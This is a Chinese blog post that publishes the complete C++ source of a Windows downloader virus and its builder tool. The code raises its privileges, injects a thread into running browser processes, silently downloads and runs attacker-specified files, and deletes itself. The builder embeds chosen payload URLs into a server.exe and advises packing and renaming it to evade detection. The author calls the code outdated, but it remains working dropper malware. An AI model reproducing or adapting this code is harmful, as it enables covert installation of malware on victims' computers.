[置顶] windows下的内存型下载者病毒
这是本人大学期间的写的,对于现在的win7已经无效,且已经能被查杀,所以放出源码供大伙参考下。
还有个生成器,可以指定需要下载的其他病毒,然后生成下载者病毒。
转载请注明出处uxyheaven csdn博客
基本思路是
step1
提权
step2
得到指定函数的指针
step3
打开目标进程(这里用的是浏览器的进程)
step4
把病毒的线程写入宿主进程里
step5
让宿主进程执行病毒线程
step6
病毒线程从网上下载特定的文件并且执行
/************************************************************
* Some Rights Reserved:Xing Yao
* 文件名称: downer.h
* 简要描述: 函数申明、结构体的定义
* 作者: 邢尧
* 当前版本: vX.y
* 修改: 邢尧
* 完成日期: 2008/11/14
* 修订说明: 改写了实现方式,原来的是插入dll,由dll启动远程
线程,现在直接在进程里插入代码。
************************************************************/
// downer.h : 下载者服务端头文件
//
#include <windows.h>
// TODO: 在此处引用程序需要的其他头文件
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) // 设置入口地址,隐藏控制台界面
// 使用6.0版的Common-Controls
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"")
/*
// 自定义加载的库
#pragma comment(lib,"kernel32.lib")
#pragma comment(lib,"shell32.lib")
#pragma comment(lib,"msvcrt.lib")
// 自定义函数入口
//#pragma comment(linker, "/ENTRY:EntryPoint")
// 自定义对齐方式
#pragma comment(linker, "/align:64")
// 合并区段
#pragma comment(linker, "/merge:.rdata=.data")
#pragma comment(linker, "/merge:.text=.data")
//#pragma comment(linker, "/MERGE:.reloc=.data")
*/
// 定义线程所需数据结构体
typedef struct THREADDATA{
int iSize; // 代码空间大小
char pMessageBox[16]; // MessageBox参数2or3,用于调试
DWORD dwMessageBox; // MessageBox入口地址
char pLoadLibrary[16]; // LoadLibrary参数1
DWORD dwLoadLibrary; // LoadLibrary入口地址
char pGetProcAddress[16]; // LoadLibrary参数2
DWORD dwGetProcAddress; // GetProcAddress入口地址
char pShellExecute[16]; // ShellExecute参数2
DWORD dwShellExecute; // ShellExecute入口地址
DWORD dwURLDownloadToFile; // URLDownloadToFile入口地址
char pDeleteFile[MAX_PATH]; // DeleteFile参数1
DWORD dwDeleteFile; // DeleteFile入口地址
DWORD dwSleep; // Sleep入口地址
char virusURL[4][64]; // 病毒的地址
char virusFile[4][64]; // 病毒文件名
}pTHREADDATA;
const char processName[8][16] = {"iexplore.exe", "IEXPLORE.EXE", "TheWorld.exe", "Maxthon.exe",
"TTraveler.exe"};
const char virus[8][64] = {"*0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0",
"*1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1",
"*0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0",
"*1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1",
"*0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0",
"*1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1",
"*0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0",
"*1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1"};
// 把本进程提至DEBUG权限
BOOL EnablePriv(void);
// 获取进程ID号
DWORD GetProcID(char* processName);
// 把线程插入某个进程里
bool Insert(char* processName, THREADDATA &threadData);
// 释放资源文件
void CreatResFile(char* flieName, WORD resName, LPCTSTR resType);
// 自删除函数
void KillMe(void);
// 远程下载函数
DWORD WINAPI DownFiles(THREADDATA &threadData);
//static void BreakPoint1 (void){}
// downer.cpp : 定义控制台应用程序的入口点。
//
//#include "stdafx.h"
#include "downer.h"
#include <Tlhelp32.h>
int main(int argc, char* argv[])
{
// 提权
EnablePriv();
// 初始化数据
THREADDATA threadData;
::ZeroMemory(&threadData, sizeof(THREADDATA));
/**/
HINSTANCE hUser32 = ::LoadLibrary ("user32.dll");
threadData.dwMessageBox = (DWORD)::GetProcAddress(hUser32 , "MessageBoxA");
//::CopyMemory(threadData.pMessageBox, "hello\0", 16);
HINSTANCE hShell32 = LoadLibrary("Shell32.dll");
threadData.dwShellExecute = (DWORD)::GetProcAddress(hShell32, "ShellExecuteA");
::CopyMemory(threadData.pShellExecute, "open\0", 16);
HINSTANCE hUrlmon = ::LoadLibrary ("urlmon.dll");
threadData.dwURLDownloadToFile = (DWORD)::GetProcAddress(hUrlmon, "URLDownloadToFileA");
HINSTANCE hKernel32 = ::LoadLibrary ("Kernel32.dll");
threadData.dwDeleteFile = (DWORD)::GetProcAddress(hKernel32, "DeleteFileA");
char lpFileName[MAX_PATH];
::GetModuleFileName(NULL, lpFileName, MAX_PATH);
::CopyMemory(threadData.pDeleteFile, lpFileName, MAX_PATH);
threadData.dwSleep = (DWORD)::GetProcAddress(hKernel32, "Sleep");
for (int i = 0; i < 4; i++)
{
::CopyMemory(threadData.virusURL[i], virus[i * 2], 64);
::CopyMemory(threadData.virusFile[i], virus[i * 2 + 1], 64);
//::MessageBoxA(NULL, threadData.virusURL[i], threadData.virusFile[i], NULL);
}
// 把代码插入进程,并执行
for (int i = 0; i < 4; i++)
{
//::MessageBox(NULL, (char *)processName[i], NULL, NULL);
if (Insert((char *)processName[i], threadData))
{
break;
}
}
//KillMe();
return 0;
}
BOOL EnablePriv() // 提权
{
HANDLE hToken;
if ( OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken) )
{
TOKEN_PRIVILEGES tkp;
LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid ); // 修改进程权限
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ); // 通知系统修改进程权限
return( (GetLastError() == ERROR_SUCCESS) );
}
return TRUE;
}
// 获取进程ID号
DWORD GetProcID(char* processName)
{
// 如无此进程则返回 0;
// char str 进程名: .exe文件.
HANDLE th = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe = {sizeof(pe)};
DWORD dwProcID = 0;
BOOL bOK = Process32First(th, &pe);
while (bOK)
{
bOK = Process32Next(th, &pe);
LPCTSTR lpszExeFile = strrchr(pe.szExeFile, '//');
if(lpszExeFile == NULL)
lpszExeFile = pe.szExeFile;
else
lpszExeFile++;
if (strcmp(processName, (char *)lpszExeFile) == 0)
{
dwProcID = pe.th32ProcessID;
break;
}
}
return dwProcID;
}
// 把线程插入某个进程里,并执行
bool Insert(char* processName, THREADDATA &threadData)
{
HANDLE hProcess = NULL;
// 打开目标进程
DWORD dwProcessId = GetProcID(processName);
hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,
FALSE, dwProcessId);
if(NULL == hProcess)
{
//::MessageBox(NULL, "OpenProcess Error!", NULL, NULL);
return false;
}
//::MessageBox(NULL, processName, NULL, NULL);
// 申请代码空间
threadData.iSize = 1024 * 4; //暂定线程体大小为4K
void *pThreadCode = ::VirtualAllocEx(hProcess, NULL, threadData.iSize, MEM_COMMIT| MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (NULL == pThreadCode)
{
//::MessageBox(NULL, "Code VirtualAllocEx Error!", NULL, NULL);
return false;
}
// 写入数据
if(!::WriteProcessMemory(hProcess, pThreadCode, &DownFiles, threadData.iSize, 0))
{
//::MessageBox(NULL, "Code WriteProcessMemory Error!", NULL, NULL);
return false;
}
// 申请数据空间
pTHREADDATA *pThreadData = (THREADDATA*)::VirtualAllocEx(hProcess,
NULL, sizeof(THREADDATA), MEM_COMMIT, PAGE_READWRITE);
if (NULL == pThreadData)
{
//::MessageBox(NULL, "Data VirtualAllocEx Error!", NULL, NULL);
return false;
}
// 写入数据
if( !::WriteProcessMemory(hProcess, pThreadData, &threadData, sizeof(THREADDATA), 0))
{
//::MessageBox(NULL, "Data WriteProcessMemory Error!", NULL, NULL);
return false;
}
// 启动远程线程
CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pThreadCode, pThreadData, 0, NULL);
return true;
}
// 自删除函数
void KillMe(void)
{
}
// 远程下载函数
DWORD WINAPI DownFiles(THREADDATA &threadData)
{
// 动态加载MessageBoxA函数
/*
typedef int (__stdcall *MYMessageBoxA)(HWND, LPCTSTR, LPCTSTR, DWORD);// 定义MessageBox函数
MYMessageBoxA myMessageBoxA;
myMessageBoxA =(MYMessageBoxA)threadData.dwMessageBox;//得到函数入口地址
*/
int i = 1;
if (i != 1) goto start;
HINSTANCE (WINAPI *MYMessageBox)(HWND, LPCTSTR, LPCTSTR, DWORD); // 定义MessageBox函数
(FARPROC&)MYMessageBox = (FARPROC&)threadData.dwMessageBox;
//MYMessageBox(NULL, threadData.pMessageBox ,NULL, NULL);
// 动态加载ShellExecute函数
start:HINSTANCE (WINAPI *MYShellExecute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR, int);
(FARPROC&)MYShellExecute = (FARPROC&)threadData.dwShellExecute;
// 动态加载URLDownloadToFile函数
DWORD (WINAPI *MYURLDownloadToFile)(LPCTSTR, LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);
(FARPROC&)MYURLDownloadToFile = (FARPROC&)threadData.dwURLDownloadToFile;
// 动态加载DeleteFile函数
DWORD (WINAPI *MYDeleteFile)(LPCTSTR);
(FARPROC&)MYDeleteFile = (FARPROC&)threadData.dwDeleteFile;
// 动态加载Sleep函数
DWORD (WINAPI *MYSleep)(DWORD);
(FARPROC&)MYSleep = (FARPROC&)threadData.dwSleep;
for (int i = 0; i < 4; i++)
{
//MYMessageBox(NULL, threadData.virusURL[i] , threadData.virusFile[i], NULL);
if (threadData.virusURL[i][0] != '*'){
MYURLDownloadToFile(NULL, threadData.virusURL[i], threadData.virusFile[i], NULL, NULL);
MYShellExecute(NULL, threadData.pShellExecute, threadData.virusFile[i], NULL, NULL, SW_HIDE);
}
}
//MYMessageBox(NULL, threadData.pDeleteFile, NULL, NULL);
MYSleep(1500);
MYDeleteFile(threadData.pDeleteFile);
return 0;
}
//static void BreakPoint1 (void){}
生成器
// DownerReginaDlg.cpp : 实现文件
//
#include "stdafx.h"
#include "DownerRegina.h"
#include "DownerReginaDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// 用于应用程序“关于”菜单项的 CAboutDlg 对话框
class CAboutDlg : public CDialog
{
public:
CAboutDlg();
// 对话框数据
enum { IDD = IDD_ABOUTBOX };
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持
// 实现
protected:
DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
}
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
}
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
END_MESSAGE_MAP()
// CDownerReginaDlg 对话框
CDownerReginaDlg::CDownerReginaDlg(CWnd* pParent /*=NULL*/)
: CDialog(CDownerReginaDlg::IDD, pParent)
{
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}
void CDownerReginaDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
DDX_Control(pDX, IDC_RICHEDIT2_VIRUSURL, m_virusURL);
DDX_Control(pDX, IDC_RICHEDIT2_VIRUSPATH, m_virusPath);
}
BEGIN_MESSAGE_MAP(CDownerReginaDlg, CDialog)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
//}}AFX_MSG_MAP
ON_BN_CLICKED(IDC_BUTTON_BUILD, &CDownerReginaDlg::OnBnClickedButtonBuild)
ON_BN_CLICKED(IDC_BUTTON_ABOUT, &CDownerReginaDlg::OnBnClickedButtonAbout)
END_MESSAGE_MAP()
// CDownerReginaDlg 消息处理程序
BOOL CDownerReginaDlg::OnInitDialog()
{
CDialog::OnInitDialog();
// 将“关于...”菜单项添加到系统菜单中。
// IDM_ABOUTBOX 必须在系统命令范围内。
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
BOOL bNameValid;
CString strAboutMenu;
bNameValid = strAboutMenu.LoadString(IDS_ABOUTBOX);
ASSERT(bNameValid);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// 设置此对话框的图标。当应用程序主窗口不是对话框时,框架将自动
// 执行此操作
SetIcon(m_hIcon, TRUE); // 设置大图标
SetIcon(m_hIcon, FALSE); // 设置小图标
// TODO: 在此添加额外的初始化代码
return TRUE; // 除非将焦点设置到控件,否则返回 TRUE
}
void CDownerReginaDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
else
{
CDialog::OnSysCommand(nID, lParam);
}
}
// 如果向对话框添加最小化按钮,则需要下面的代码
// 来绘制该图标。对于使用文档/视图模型的 MFC 应用程序,
// 这将由框架自动完成。
void CDownerReginaDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // 用于绘制的设备上下文
SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(dc.GetSafeHdc()), 0);
// 使图标在工作区矩形中居中
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// 绘制图标
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialog::OnPaint();
}
}
//当用户拖动最小化窗口时系统调用此函数取得光标
//显示。
HCURSOR CDownerReginaDlg::OnQueryDragIcon()
{
return static_cast<HCURSOR>(m_hIcon);
}
void CDownerReginaDlg::OnBnClickedButtonBuild()
{
// TODO: 在此添加控件通知处理程序代码
UpdateData(true);
if (m_virusURL.GetLineCount() != m_virusPath.GetLineCount())
{
::MessageBox(NULL, "URL与Path总数不一致,请检查,注意最后一行不用输入回车!", NULL, NULL);
return;
}
if (m_virusURL.GetLineCount() > 4)
{
::MessageBox(NULL, "抱歉bate1版目前只支持4个!", NULL, NULL);
return;
}
CreatResFile("server.exe", IDR_EXERES_DOWNER, "EXERES");
/*
CString buf;
CString buf2;
int size;
m_virusURL.GetWindowTextA(buf);
buf += "\r\n";
m_virusPath.GetWindowTextA(buf2);
buf += buf2;
buf += "\r\n";
buf += (char*)m_virusURL.GetLineCount();
CFile file("server.exe", CFile::modeWrite);
file.SeekToEnd();
file.Write(buf, buf.GetLength());
size = m_virusURL.GetLineCount();
file.Write(&size, sizeof(int));
size = buf.GetLength() + 8;
file.Write(&size, sizeof(int));
*/
::MessageBox(NULL, "server.exe已生成,建议加壳、改名使用!", NULL, NULL);
UpdateData(false);
}
void CDownerReginaDlg::OnBnClickedButtonAbout()
{
// TODO: 在此添加控件通知处理程序代码
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
// 释放资源文件
bool CDownerReginaDlg::CreatResFile(char* flieName, WORD resName, LPCTSTR resType)
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize, dwWritten;
LPBYTE p;
HANDLE hFile;
// 查找所需的资源
hResInfo = FindResource(NULL, MAKEINTRESOURCE(resName), resType);
if (hResInfo == NULL)
{
::MessageBox(NULL, "查找资源失败!", NULL, NULL);
return true;
}
dwSize = SizeofResource(NULL, hResInfo); // 获得资源尺寸
hResData = LoadResource(NULL, hResInfo); // 装载资源
if(hResData == NULL)
{
::MessageBox(NULL, "装载失败!", NULL, NULL);
return true;
}
p = (LPBYTE)GlobalAlloc(GPTR, dwSize); // 为数据分配空间
if (p == NULL)
{
::MessageBox(NULL,"分配内存失败!", NULL, NULL);
return true;
}
::CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
hFile = CreateFile(flieName, GENERIC_WRITE | CREATE_ALWAYS, 0, NULL, CREATE_ALWAYS,0, NULL); // 复制资源数据
// 修改资源
char buf[64];
int address = 0x11B8 - 0x40;
for (int i = 0; i < m_virusURL.GetLineCount(); i++)
{
m_virusURL.GetLine(i, buf, 64);
buf[strlen(buf) - 1] = '\0';
address += 0x40;
::CopyMemory((LPVOID)(p + address), buf, 64);
m_virusPath.GetLine(i, buf, 64);
buf[strlen(buf) - 1] = '\0';
address += 0x40;
::CopyMemory((LPVOID)(p + address), buf, 64);
}
if(hFile != NULL)
{
WriteFile(hFile, (LPCVOID)p, dwSize, &dwWritten, NULL); // 创建文件,写数据
}
else
{
::MessageBox(NULL, "创建文件失败!", NULL, NULL);
::GlobalFree((HGLOBAL)p);
return true;
}
CloseHandle(hFile); // 收尾工作,释放资源
::GlobalFree((HGLOBAL)p);
return false;
}